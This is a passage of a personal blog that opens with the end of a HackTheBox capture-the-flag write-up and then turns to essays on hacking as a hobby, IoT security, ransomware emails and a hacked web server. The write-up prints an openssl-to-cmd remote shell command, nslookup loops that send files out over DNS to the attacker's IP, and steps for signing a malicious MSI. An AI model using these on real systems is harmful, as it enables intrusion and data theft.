'190000000100000010000000E53D34CECB05C17EE332C749D78C02560F000000010000001000000065FC47520F66383962EC0B7B88A0821D03000000010000001400000018F7C1FCC3090203FD5BAA2F861A754976C8DD2509000000010000000C000000300A06082B060105050703080B000000010000003400000056006500720069005300690067006E002000540069006D00650020005300740061006D00700069006E00670020004300410000001400000001000000140000003EDF290CC1F5CC732CEB3D24E17E52DABD27E2F02000000001000000C0020000308202BC3082022502104A19D2388C82591CA55D735F155DDCA3300D06092A864886F70D010104050030819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E301E170D3937303531323030303030305A170D3034303130373233353935395A30819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E30819F300D06092A864886F70D010101050003818D0030818902818100D32E20F0687C2C2D2E811CB106B2A70BB7110D57DA53D875E3C9332AB2D4F6095B34F3E990FE090CD0DB1B5AB9CDE7F688B19DC08725EB7D5810736A78CB7115FDC658F629AB585E9604FD2D621158811CCA7194D522582FD5CC14058436BA94AAB44D4AE9EE3B22AD56997E219C6C86C04A47976AB4A636D5FC092DD3B4399B0203010001300D06092A864886F70D01010405000381810061550E3E7BC792127E11108E22CCD4B3132B5BE844E40B789EA47EF3A707721EE259EFCC84E389944CDB4E61EFB3A4FB463D50340B9F7056F68E2A7F17CEE563BF796907732EB095288AF5EDAAA9D25DCD0ACA10098FCEB3AF2896C479298492DCFFBA674248A69010E4BF61F89C53E593D1733FF8FD9D4F84AC55D1FD116363',
....
]
for cert in certs:
    print '======================================='
    print cert
    print '======================================='
    print cert.decode('hex')
    print '======================================='
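
To feed the certificates to openssl or certutil for proper parsing, the DER blob can also be carved out of each value – keying on the typical 30 82 SEQUENCE header. A rough sketch in the same Python 2 style as the snippet above, admittedly not robust:

# carve the DER certificate out of each registry blob ('certs' is the list of hex strings above)
for i, cert in enumerate(certs):
    raw = cert.decode('hex')
    idx = raw.find('\x30\x82')    # first DER SEQUENCE header - good enough here, not robust
    if idx != -1:
        open('cert_%d.der' % i, 'wb').write(raw[idx:])
# afterwards e.g.: openssl x509 -inform der -in cert_0.der -noout -subject -issuer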

OK, certainly not the most elegant way to deal with it, but I was losing patience – I was on the warpath!!

Strings in the output contain the CAs’ Issuer and Subject Names, and most were familiar – Microsoft, VeriSign, etc. – with this exception:

=======================================
¬·╟<          òë┌┐ò$º¿Y╔&┌╢e½s╦π≥│τÇ╤#w▌╙o╠D       ╖è╔└eîqD╕ß!└öPδ⌠ ¡      ü¿M»╬Φv√tÄ.LgawĽ0ß       τ9╡ïε╢æï
  é0é010 U  My CA0é"0≥▀~àE~Γ<éíFj0
é ¥═p|ÉÉ▒ôfD╬,°á3╣Zƒ╕Cáφs╖Kεmìδ╗wFo2ßÄK ┘Xì╧Y?ÉR╢&,V┘Ω╠û5¬Σ▒┴Γ╧B·Gb4éτåi0Ku rí╕Oh≈φ¬u≤h¥J ┌┌º(┐Jk<√=-9{£H[▀ªP&«¢ΣU■2~ ½Öº-4║o/σ£oºå─∙Åédü¿éÅêr▐O.╘<'Qu∙w0~▒A±·â·{k
  é hòÿâ⌠╝*εC╡Åπs⌠╝[░╣±kπ{≥¬æ±¬╠b┐╤GëJ»i%┴       ╕ìiΦπ %¬*π[ò╗,9ü:╦-5  úV0T0 U  0  0A U :08ǽÖ┬ï]═8¬I¡X^⌠í010 U  My CAé÷h≥▀~àE~Γ<éíFj0

▀ó*┌û╞Qfè£ⁿ─;Lτ·II╫─╓┴¼╤N∩j Φ
)x═Mπ╪₧⌠ç╛ê┤YF:╛╢╙êDτσªM]Gá⌐ S≡∞Yg J»╪u

...

Maybe hard to spot, but there was a CA called My CA! But where was the key I needed to sign my own Code Signing cert?

In such cases, I typically resort to more Windows registry forensics. I hoped that ‘jorge’ or the box’s creators had touched a folder containing this certificate and key. I walked through various Explorer-related keys, especially the infamous Shellbags:

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2
    NodeSlot    REG_DWORD    0x3
    MRUListEx    REG_BINARY    0100000000000000FFFFFFFF
    0    REG_BINARY    4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000
    1    REG_BINARY    5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1

… and I really saw a folder called Certs after decoding:

>>> print s.decode('hex')
n 1     µLGu VISUAL~1  V          ∩╛µLGuµLGu.   z¿                    åUÉ V i s u a l   S t u d i o   2 0 1 7   
>>> s='4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000'
>>> print s.decode('hex')
J 1     █L╓│ DEV 8        ∩╛█LÅ│█L╓│.   $                    Ö0e D E V   
>>> s='5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000'
>>> print s.decode('hex')
P 1     τLJ« Certs <      ∩╛τLA«τLJ«.   I.                    Ωτ╜ C e r t s    >>>

… and a link to a folder called MSIs:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder
    0    REG_BINARY    5000750062006C0069006300000060003200000000000000000000005075626C69632E6C6E6B0000460009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000005000750062006C00690063002E006C006E006B0000001A000000
    MRUListEx    REG_BINARY    020000000100000000000000FFFFFFFF
    1    REG_BINARY    4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000
...
>>> s='4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000'
>>> print s.decode('hex')
M S I s   Z 2           MSIs.lnk  B        ∩╛        .                             M S I s . l n k   
>>> 

Then I did what I should have done before – checking out the Recent Docs folder directly …

Directory of C:\Users\jorge\AppData\Roaming\Microsoft\Windows\Recent

07/07/2018  09:47 PM               405 EFS.lnk
07/07/2018  09:53 PM               555 MSIs.lnk
07/07/2018  09:53 PM               678 note.lnk
07/07/2018  09:49 PM               690 Public.lnk
07/09/2018  09:13 PM               612 system32.lnk
07/04/2018  09:17 PM               527 user.lnk

… the file MSIs.lnk contained the path:

...
D:\DEV\MSIs
...

So there was a D: drive I had totally missed – and there I found a key MyCA.pvk and a certificate MyCA.cer.

The ‘funny’ thing now is that the LNK file I had hijacked before pointed to Visual Studio installed on the D: drive. So the intended way was likely to go straight to this folder, see the Certs and MSIs folders, and conclude you need to sign an MSI.

Signing that darn thing finally :-)

I wanted to re-use the openssl process I had tested before. But openssl cannot use PVK files (AFAIK ;-)) – you can, however, convert PVK keys to PFX (PKCS#12).

I ran

pvk2pfx /pvk MyCA.pvk /spc MyCA.cer

… to start a GUI certificate export wizard that let me specify the PFX password.

Then I converted the PFX key to PEM

openssl pkcs12 -in MyCA.pfx -out MyCA.pem -nodes

… and the binary (‘DER’) certificate to PEM

openssl x509 -inform der -in MyCA.cer -out MyCA.cer.pem
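
A quick sanity check – not strictly necessary – that the converted key really belongs to the certificate: the two digests below should be identical.

openssl x509 -noout -modulus -in MyCA.cer.pem | openssl md5
openssl rsa -noout -modulus -in MyCA.pem | openssl md5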

I issued a Code Signing certificate for a user with CN Test 1 (same process as with the demoCA), and used this to sign the final payload! I imported MyCA.cer to the Trusted Roots and again referenced the CN of the user in signtool:

signtool sign /n "Test 1" /v half_shell_MyCA.msi
The following certificate was selected:
    Issued to: Test 1
    Issued by: My CA
    Expires:   Sat May 09 14:54:50 2020
    SHA1 hash: 0CDBA139B0E93813969E9E82F1E739C962BA6A3B

Done Adding Additional Store
Successfully signed: half_shell_MyCA.msi

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0

I verified the MSI also with

signtool verify /pa /v half_shell_MyCA.msi

My final signed MSI payload was what I called a half shell, a command like this:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd &"

You can execute commands, but you do not get the output back. I tried to use my resources most efficiently.

A text note told us that the admin ‘rupal’ would test MSIs frequently. So I needed one openssl listener – thus one of the two precious open ports – for waiting for rupal.

I used the other open port for uploading the MSI, ‘nc-style’ again with openssl.

But if I really wanted output from the blind half shell, I could also embed the command in nslookup. So I used rce.py to create this type of command (it has an option to just display, but not run, a command), which I would then paste into the input window of jorge’s half shell.

FOR /F "tokens=1-26" %a in ('copy half_shell_MyCA.msi D:\DEV\MSIs') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

And rupal called back!

\o/

But he also only had half a shell, so I read root.txt via nslookup, pasting this command into his half shell:

FOR /F "tokens=1-26" %a in ('type C:\Users\rupal\Desktop\root.txt') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

What an adventure!

Ethereal-owned

Hacking

I am joining the ranks of self-proclaimed productivity experts: Do you feel distracted by social media? Do you feel that too much scrolling through feeds transforms your mind – in a bad way? Solution: Go find an online platform that will put your mind in a different state. Go hacking on hackthebox.eu.

I have been hacking boxes over there for quite a while – and obsessively. I really wonder why I did not try to attack something much earlier. It’s funny as I have been into IT security for a long time – ‘infosec’ as it seems to be called now – but I was always a member of the Blue Team, a defender: Hardening Windows servers, building Public Key Infrastructures, always learning about attack vectors … but never really testing them extensively myself.

Earlier this year I was investigating the security of some things. They were black-boxes to me, and I figured I finally needed to learn about some offensive tools – so I set up a Kali Linux machine. Then I searched for the best way to learn about these tools; I read articles and books about pentesting. But I had no idea if these ‘things’ were vulnerable at all, and where to start. So I figured: Maybe it is better to attack something made vulnerable intentionally? There are vulnerable web applications, and you can download vulnerable virtual machines … but then I remembered I had seen posts about hackthebox some months ago:

As an individual, you can complete a simple challenge to prove your skills and then create an account, allowing you to connect to our private network (HTB Labs) where several machines await for you to hack them.

Back then I had figured I would not pass this entry challenge nor hack any of these machines. It turned out otherwise, and it has been a very interesting experience so far – to learn about pentesting tools and methods on-the-fly. It has all been new, yet familiar in some sense.

Once I had been a so-called expert for certain technologies or products. But very often I became that expert by effectively reverse engineering the product a few days before I showed off that expertise. I had the exact same mindset and methods that are needed to attack the vulnerable applications of these boxes. I believe that in today’s world of interconnected systems, rapid technological change, [more buzz words here], every ‘subject matter expert’ is often actually reverse engineering – rather than applying knowledge acquired by proper training. I had certifications, too – but typically I never attended a course; I just took the exam after I had learned on the job.

On a few boxes I could use in-depth knowledge about protocols and technologies I had long-term experience with, especially Active Directory and Kerberos. However, I did not find those boxes easier to own than e.g. the Linux boxes where everything was new to me. With Windows boxes I focussed too much on things I knew, and overlooked the obvious. On Linux I was just a humble learner – and it seemed this made me find the vulnerability or misconfiguration faster.

I felt like time-travelling back to when I started ‘in IT’, back in the late 1990s. Now I can hardly believe that I went directly from staff scientist in a national research center to down-to-earth freelance IT consultant – supporting small businesses. With hindsight, I knew so little both about business and about how IT / Windows / computers are actually used in the real world. I tried out things, I reverse engineered, I was humbled by what remains to be learned. But on the other hand, I was delighted by how many real-life problems – for whose solution people were eager to pay – can be solved pragmatically by knowing only 80%. Writing academic papers had felt more like aiming at 130% all of the time – but before that you have to beg governmental entities to pay for it. Some academic colleagues were upset by my transition to the dark side, but I never saw this chasm: Experimental physics was about reverse engineering natural black-boxes – and sometimes about reverse engineering your predecessors’ enigmatic code. IT troubleshooting was about reverse engineering software. Theoretically it is all about logic and just zeros and ones, and you should be able to track down the developer who can explain that weird behavior. But in practice, as a freshly minted consultant without any ‘network’ you can hardly track down that developer in Redmond – so you make educated guesses and poke around the system.

I also noted eerie coincidences: In the months before being sucked into hackthebox’s black hole, I had been catching up on Python, C/C++, and Powershell – for productive purposes, for building something. But all of that is very useful now, for using or modifying exploits. In addition I realize that my typical console applications for simulations and data analysis are quite similar ‘in spirit’ to typical exploitation tools. Last year I also learned about design patterns and best practices in object-oriented software development – and I was about to overdo it. Maybe it’s good to throw in some Cowboy Coding for good measure!

But above all, hacking boxes is simply addictive in a way that cannot be fully explained. It is like reading novels about mysteries and secret passages. Maybe this is what computer games are to some people. Some commentators say that machines on pentesting platforms are more Capture-the-Flag-like (CTF) than real-world pentesting. It is true that some challenges have a ‘story line’ that takes you from one solved puzzle to the next one. To some extent a part of the challenge has to be fabricated as there are no real users to social engineer. But there are very real-world machines on hackthebox, e.g. requiring you to escalate from one object in a Windows domain to another.

And if you ever have seen what stuff is stored in clear text in the real world, or what passwords might be used ‘just for testing’ (and never changed) – then also the artificial guess-the-password challenges do not appear that unrealistic. I want to emphasize that I am not the one to make fun of weak test passwords and the like at all. More often than not I was the one whose job was to get something working / working again, under pressure. Sometimes it is not exactly easy to ‘get it working’ quickly, in an emergency, and at the same time considering all security implications of the ‘fix’ you have just applied – by thinking like an attacker. hackthebox is an excellent platform to learn that, so I cannot recommend it enough!

An article about hacking is not complete if it lacks a clichéd stock photo! I am searching for proper hacker’s attire now – this was my first find!

Internet of Things. Yet Another Gloomy Post.

Technically, I work with Things, as in the Internet of Things.

As outlined in Everything as a Service many formerly ‘dumb’ products – such as heating systems – become part of service offerings. A vital component of the new services is the technical connection of the Thing in your home to that Big Cloud. It seems every energy-related system has got its own Internet Gateway now: Our photovoltaic generator has one, our control unit has one, and the successor of our heat pump would have one, too. If vendors don’t bundle their offerings soon, we’ll end up with substantial electricity costs for powering a lot of separate gateways.

Experts have warned for years that the Internet of Things (IoT) comes with security challenges. Many Things’ owners still keep default or blank passwords, but the most impressive threat in my opinion is not hacking individual systems: Easily hacked things can be hijacked to serve as zombie clients in a botnet and launch a joint Distributed Denial of Service attack against a single target. Recently the blog of renowned security reporter Brian Krebs was taken down, most likely as an act of revenge by DDoSers (crime is now offered as a service as well). The attack – a tsunami of more than 600 Gbps – was described as one of the largest the internet had seen so far. Hosting provider OVH was subject to a record-breaking Tbps attack – launched via captured … [cue: hacker movie cliché] … cameras and digital video recorders on the internet.

I am about the millionth blogger ‘reporting’ on this, nothing new here. But the social media news about the DDoS attacks collided with another social media micro outrage  in my mind – about seemingly unrelated IT news: HP had to deal with not-so-positive reporting about its latest printer firmware changes and related policies –  when printers started to refuse to work with third-party cartridges. This seems to be a legal issue or has been presented as such, and I am not interested in that aspect here. What I find interesting is the clash of requirements: After the DDoS attacks many commentators said IoT vendors should be held accountable. They should be forced to update their stuff. On the other hand, end users should remain owners of the IT gadgets they have bought, so the vendor has no right to inflict any policies on them and restrict the usage of devices.

I can relate to both arguments. One of my main motivations ‘in renewable energy’ or ‘in home automation’ is to make users powerful and knowledgable owners of their systems. On the other hand I have been ‘in security’ for a long time. And chasing firmware for IoT devices can be tough for end users.

It is a challenge to walk the tightrope really gracefully here: A printer may be traditionally considered an item we own, whereas the internet router provided by the telco is theirs. So we can tinker with the printer’s inner workings as much as we want, but we must not touch the router and let the telco do their firmware updates. But old-school devices are given more ‘intelligence’ and need to be connected to the internet to provide additional services – like that printer that allows you to print from your smartphone easily (yes, but only if you register it at the printer manufacturer’s website first). In addition, our home is not really our castle anymore. Our computers aren’t protected by the telco’s router / firmware all the time; we work in different networks or in public places. All the Things we carry with us, someday smart wearable technology, will check in to different wireless and mobile networks – so their security bugs had better be fixed in time.

If IoT vendors should be held accountable and update their gadgets, they have to be given the option to do so. But if the device’s host tinkers with it, firmware upgrades might stall. In order to protect themselves from legal persecution, vendors need to state in contracts that they are determined to push security updates and you cannot interfere with it. Security can never be enforced by technology only – for a device located at the end user’s premises.

It is a horrible scenario – and I am not sure if I refer to hacking or to the proliferation of even more bureaucracy and over-regulation, which should protect us from hacking but will add more hurdles for would-be start-ups that dare to sell hardware.

Theoretically a vendor should be able to separate the security-relevant features from nice-to-have updates. For example, in a similar way, in smart meters the functions used for metering (subject to metering law) should be separated from ‘features’ – the latter being subject to remote updates while the former must not. Sources told me that this is not an easy thing to achieve, at least not as easy as presented in the meters’ marketing brochure.

Linksys's Iconic Router

That iconic Linksys router – sold for more than 10 years (and a beloved test device of mine). Still popular because you could use open source firmware. Something that new security policies might seek to prevent.

If hardware security cannot be regulated, there might be more regulation of internet traffic. Internet Service Providers could be held accountable for removing compromised devices from their networks, for example after having notified the end user several times. Or smaller ISPs might be cut off by upstream providers. Somewhere in the chain of service providers we will have to deal with more monitoring and regulation, and in one way or another the playful days of the earlier internet (romanticized with hindsight, maybe) are over.

When I saw Krebs’ site going offline, I wondered what a small business should do in general: His site is now DDoS-protected by Google’s Project Shield, a service offered to independent journalists and activists, after his former pro-bono host could not deal with the load without affecting paying clients. So one of the Siren Servers I have commented on critically so often came to the rescue! A small provider will not be able to deal with such attacks.

WordPress.com should be well-protected, I guess. I wonder if we will all end up hosting our websites at such major providers only, or ‘blog’ directly to Facebook, Google, or LinkedIn (now part of Microsoft) to be safe. I had advised against self-hosting WordPress myself: If you miss security updates you might jeopardize not only your website, but also others using the same shared web host. If you live on a platform like WordPress dot com or Google, you will complain from time to time about limited options or feature updates you don’t like – but you don’t have to care about security. I compare this to avoiding legal issues as an artisan selling hand-made items via Amazon or the like, in contrast to having to update your own shop’s business logic after every change in international tax law.

I have no conclusion to offer. Whenever I read news these days – on technology, energy, IT, anything in between, The Future in general – I feel reminded of this tension: Between being an independent neutral netizen and being plugged in to an inescapable matrix, maybe beneficial but Borg-like nonetheless.

Have I Seen the End of E-Mail?

Not that I desire it, but my recent encounters with ransomware make me wonder.

Some people in, say, accounting or HR departments are forced to use e-mail with utmost paranoia. Hackers send alarmingly professional e-mails that look like invoices, job applications, or notifications of postal services. Clicking a link starts the download of malware that will encrypt all your data and ask for ransom.

Theoretically you could still find out if an e-mail was legit by cross-checking with open invoices, job ads, and expected mail. But what if hackers learn about your typical vendors from your business website or if they read your job ads? Then they would send plausible e-mails and might refer to specific codes, like the number of your job ad.

Until recently I figured that only medium or larger companies would be subject to targeted attacks. One major Austrian telco was the victim of a Denial of Service attack and challenged to pay ransom. (They didn’t, and were able to deal with the attack successfully.)

But then I encountered a new level of ransomware attacks – targeting very small Austrian businesses by sending ‘expected’ job applications via e-mail:

  • The subject line was Job application as [a job that had been advertised weeks ago at a major governmental job service platform]
  • It was written in flawless German, using typical job applicant’s lingo as you learn in trainings.
  • It was addressed to the personal e-mail of the employee dealing with applications, not the public ‘info@’ address of the business
  • There was no attachment – so malware filters could not have found anything suspicious – but only a link to a shared cloud folder (‘…as the attachments are too large…’) – run by a legit European cloud company.
  • If you clicked the link (which you should not do unless you do this on a separate test-for-malware machine in a separate network) you saw a typical applicant’s photo and a second file – whose name translated to JobApplicationPDF.exe.

Suspicious features:

  • The EXE file should have triggered red lights. But it is not impossible that a job application comes as a self-extracting archive, although I would compare that to wrapping your paper application in a box looking like a fake bomb.
  • Google’s Image Search showed that the photo has been stolen from a German photographer’s website – it was an example for a typical job applicant’s photo.
  • Both cloud and mail service used were less known ones. It has been reported that Dropbox had removed suspicious files so it seemed that attackers turned to alternative services. (Both mail and cloud provider reacted quickly and shut down the suspicious accounts)
  • The e-mail did not contain a phone number or street address, just the pointer to the cloud store: Possible but weird as an applicant should be eager to encourage communications via all channels. There might be ‘normal’ issues with accessing a cloud store link (e.g. link falsely blocked by corporate firewall) – so the HR department should be able to call the applicant.
  • Googling the body text of the e-mail gave one result only – a new blog entry of an IT professional quoting it at full length. The subject line was personalized to industry sector and a specific job ad – but the bulk of the text was not.
  • The non-public e-mail address of the HR person was googleable, as the job ad plus contact data appeared on a job platform in a different language and country – without the small company’s consent, of course. So both e-mail address and job description could be harvested automatically.

I also wonder if my Everything as a Service vision will provide a cure: More and more communication has been moved to messaging on social networks anyway – for convenience and to avoid mails being falsely flagged as spam. E-Mail – powered by the old SMTP protocol with tacked-on security features, run on decentralized mail servers – is being replaced by messaging happening within a big monolithic block of a system like Facebook messaging. Larger employers already require their applicants to submit their CVs using their web platforms, just as large corporations demand that their suppliers use their billing platform instead of sending invoices per e-mail.

What needs to be avoided is downloading an executable file and executing it in an environment not controlled by security policies. A large cloud provider might have a better chance to enforce security, and viewing or processing an ‘attachment’ could happen in the provider’s environment. As an alternative, all ‘our’ devices might actually be part of a service and controlled more tightly by centrally set policies. Disclaimer: Not sure if I like that.

Iconic computer virus - from my very first small business website in 1997. Image credits mine.


Shortest Post Ever

… self-indulgent, admittedly – but just to add an update on the previous post.

My new personal website is live:

elkement.subversiv.at

I have already redirected the root URLs of the precursor sites radices.net, subversiv.at and e-stangl.at. Now I am waiting for Google’s final verdict; then I am going to add the rewrite map for the 1:n map of old ASP files and new ‘posts’. This is also the pre-requisite for informing Google about the move officially.

The blog-like structure and standardized attributes like Open Graph meta tags and an XML sitemap should make my site more Google-likeable. With the new site – and one dedicated host name only – I finally added permanent redirects (HTTP 301). Before, I used temporary (HTTP 302) redirects to send requests from the root directory to subfolders, which (so the experts say) is not search-engine-friendly.

On the other hand the .at domain will not help: You can pick a certain country as preferred audience for a non-country domain, but I have to stick with Austria here, even if the language is set to English in all the proper places (I hope).

I have discovered that every WordPress.com Tag or Category has its own feed – just add /feed/ to the respective URL – and I will make use of this in order to automate some of my link curation, like this. This list of physics postings has been created from this feed of selected postings:
https://elkement.wordpress.com/category/science-and-technology/physics/feed/
Of course this means re-tagging and re-categorizing here! Thanks WordPress for the Tags to Categories (and vice versa) Conversion Tools!

It is fun to watch my server’s log files more closely. Otherwise I would have missed that SQL injection attack attempt, trying to put spammy links on my website (into my database):

SQL injection by spammer-hackers

Looking for Patterns

Scott Adams, of Dilbert fame, has a lot of useful advice in his autobiographical book How to Fail at Almost Everything and Still Win Big. He recommends looking for patterns in your life, without attempting to theorize about cause and effect. Learning from those patterns you could increase the chance that luck will hit you. I believe in increasing your options, so I can relate a lot to applying this approach to Life, the Universe and Everything.

It should be true in relation to the iconic example of patterns, that is: web traffic. In this post I’ll try to briefly summarize what I have learned so far from the most recent unfortunate events (this is PR speak for disaster). I have been intrigued by web statistics, web servers’ log files, and the summaries shown by the free Google or Bing Webmaster Tools for a long time, but I started to follow the trends more closely after my other, non-WordPress web server had been hacked at the end of November.

How do you recognize that your site has been hacked?

This is very different from what you might expect from popular lore and movies. I downloaded the log files for my web server from time to time, and I just noticed that suddenly the size of the daily files was about twice the usual. Inspecting the IP addresses the traffic to my site came from, I spotted a lot of hits by the Google bot. Sites are indexed all the time, but I was baffled by the URLs – all pointing to pages that should not exist on my server. These URLs contained a long query string with all kinds of brand names, as you know them from spam comments or e-mails.

This is an example line in the log file:

Spammy page on hacked web server, accessed by Google bot

This IP address belongs to a *.googlebot.com machine, as can be confirmed by resolving the name, e.g. using nslookup. The worrying fact was the status code 200, which means the page had indeed been there.

A few days later this had changed to a 404, so the page did not exist anymore:

Spammy page removed from hacked web server, Google bot tries to access it.

The attack had happened on the weekend, and the pages had been removed immediately by my hosting provider.

To cross-check whether those pages had indeed been indexed by Google, I searched for site:[domain name]. This is a snippet from the search results – the spammers even borrowed the tag line of our legitimate site as a description (which I cropped from the screenshot here).

Spammy page in Google’s index

Overall these were just a bunch of different pages (ASP files), but Google recognizes every different query string, appended after the question mark, as a different URL. So suddenly Google had a lot more URLs to index, and you could see a spike in Webmaster Tools:

Crawl stats after hack

There was also a warning message on the welcome page:

Google warning message about 404 errors

What to do?

Obviously the first thing is to delete the spammy pages and deal with whatever vulnerability had been exploited. This was done before I noticed the hack myself. But I am still in clean-up mode to get the spammy pages removed from Google’s index:

robots.txt. Using the site:[domain name] search I identified all the spammy pages and added them to the robots.txt file on my server. This file tells search engines which pages not to index. Fortunately you do not have to add each individual URL – adding the page (ending in .asp in this case) is sufficient.
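
The relevant lines were something along these lines – the page name here is just a made-up example:

User-agent: *
Disallow: /spammypage.asp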

But pages were still in the index after that, just the description was changed to:
A description for this result is not available because of this site’s robots.txt.

As far as I can tell, entries are still added to the index if somebody else links to your pages (actually, spammy pages on other hacked servers, see root cause analysis below). But as Google is not allowed to investigate the target as per robots.txt, it only adds the link without a description.

URL parameters. Since the spammy pages all use query strings and all strings have the same parameter – [page].asp?dca= in my case – I tried managing the URL parameters via Webmaster Tools. This is actually an option to let Google know if a query string should really denote another version of a page, or if all query strings for one page should be indexed as a single page. E.g. I am using a query string called imgClicked to magnify an image when clicking on the top image, and I could tell Google that the clicked / unclicked image should not be counted as different URLs.

In the special case of the spammy pages I tried to tell Google that different dca values don’t make for a separate page (which would result in about 6 spammy URLs in the index instead of 1500) but this did not impact the gradual accumulation of indexed spammy pages.

Mind-numbing work. To get rid of all pages as fast as possible I also removed each. of. them. manually. via Google Webmaster Tools. This means:

  • Click on the URL from the search results, opening a new tab. This results in a 404.
  • Copy the URL from the address bar to web master tools in the form for removing the URL.
  • Click submit.
  • Repeat 1500 times.

I am now at about 500. Not all spammy pages that ever existed are displayed at once in the index, but about 10 are added every day. Where do they come from after the original pages had been deleted?

How was this hack actually supposed to work?

The legitimate pages had not been changed or vandalized; the hacker-spammers just placed additional pages on the server. I would never have noticed them, had I not encountered Google’s indexing activities.

I was curious what those pages had looked like, so I inspected Google’s cache by searching for cache:[spammy URL]. The cached page consisted of:

  • Your typical junk of spammy text, otherwise I would be delighted about raw material for poetry.
  • A list of links to other spammy pages, most of them on my hacked server.
  • An exact copy of the default page of this (legitimate) web site.

I haven’t investigated all those more than 1000 pages and the spammy links displayed on them, but I conjectured there had to be some outbound links to other – hacked – servers. Links will only be boosted if there are backlinks from seemingly independent web sites. Somehow this should make people buy something in a shady webshop at the end of a cascade of links.

After some weeks I was able to confirm this as Google web master tools now show external backlinks to my domain from other spammy pages on legitimate sites, mostly small businesses in the US. Many of them used the same provider that obviously had been hacked as well.

This explains where the gradual supply of spammy links to the index comes from: Google has followed the spammy links from the other hacked servers inbound to my server. It seems to take a while to clean this out, as all the other webmasters have removed their pages as well – I checked each. of. them. from the long list supplied by Google as a CSV file.

Had I not been hacked, I might never have become aware of the completely unrelated onslaught by Google itself, targeted at this blog. I reported on this in detail previously; here is just an update and a summary.

Edit, as from the comments I conclude this was not clear: The following analysis is unrelated to the hack of the non-WordPress site – the hacked site had not been penalized by Google so far. But the blog you are reading right now was.

Symptoms of your site having been penalized by a search engine

Rapid decline of impressions. Webmaster Tools show a period of 3 months maximum. I have checked the trend for all my sites now and then, but there was actually never anything that constituted a real trend. But for this blog, page impressions went from a few hundred – often more than 1000 – per day this summer to less than 10 per day now.

Page impressions Sept to Dec

Page impressions stayed at their all-time low since last time, so just extend that graph to the right.

Comparison with sites that should rank much lower. Currently this blog gets about as many – or as few – impressions as my personal website e-stangl.at. Its Google pagerank is 1 – as compared to 3 for the WordPress blog; I only update it every quarter at most, and its word count is perhaps a thousandth of this blog’s.

My other two sites subversiv.at and radices.net score better, although I update them only about once every 6 weeks, and I am pretty sure I violate best practices due to my creative mixing of languages, commenting on my own stuff, and/or curating enormous lists of outbound links.

It is ironic that Google has penalized this blog now, as of autumn 2014 my quality control has become more ruthless. I had quite a number of posts in Drafts, with more than 1000 words each, edited and spell-checked – and finally deleted all of them. The remaining posts were the ones requiring considerable research, plus my poetry. This spam poem is one of my most popular posts as per Google’s page impressions. So all theorizing is really futile, and I should better watch the pattern emerge.

Identifying offending pages. I added an update to the previous post as I spotted the offending pages using the following method:

  • Identify your top performing pages by ranking pages in the list of search results by impressions or clicks.
  • Then order pages in the list of search results by page name. This is effectively ranking by date for blogs, and the list can be compared to the archive of all pages.
  • Make the time span covered by the Google tools smaller and smaller and check if one of your former top pages is suddenly vanishing from the list.

In my case these pages were:

  • A review of a new, a bit unconventional, textbook on quantum field theory and
  • a list of physics books, blogs and websites.

As a reader pointed out correctly this does not mean that the page has been deleted from the index – as you can confirm by searching for site:[Offending URL] explicitly or by adding a more specific search criterion, like adding elkement. I found that the results displayed for my offending pages are erratic: Sometimes, surprisingly, the page will still show up if I just use the title of the post; perhaps a consequence of me, owner of the site, being logged on to Google. Sometimes I need to add an additional keyword to move it to the top in search results again.

But anyway, even if the pages had not been deleted, they had been pushed back to search results page >10.

Something had been deleted from the index though. Here is the number of indexed pages over time, showing a decline starting at the time impressions were plummeting, too:

Pages indexed by Google for this blog as per writing of this post

I cannot see a similar effect for any of the other sites, and as far as I know it does not correlate with some Google update (Google has indicated a major update in March 2014 in the figure).

Find the root cause. Apart from links on my own sites, and links on other blogs, my blog has no backlinks. As I learned in this research, backlinks from forums are often tagged nofollow so that search engines do not consider them spammy. This means links from your avatar commenting on other pages might not boost your blog, but might not hurt either.

The only ‘worthy’ backlink was from the page dedicated to that book I had reviewed – and that page linked exactly to the offending pages. My blog and the author’s page may look to Google like the tangle of cross-linked spammy pages the hackers had misused my other web server for.

